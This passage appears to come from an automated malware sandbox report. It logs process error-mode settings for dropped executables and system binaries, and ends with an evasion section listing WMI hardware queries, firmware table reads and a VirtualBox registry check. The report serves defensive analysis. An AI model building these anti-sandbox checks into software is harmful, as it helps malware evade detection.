                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: A_22rjVO67ooiUk2ueyL6tMl.exe PID: 6444, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
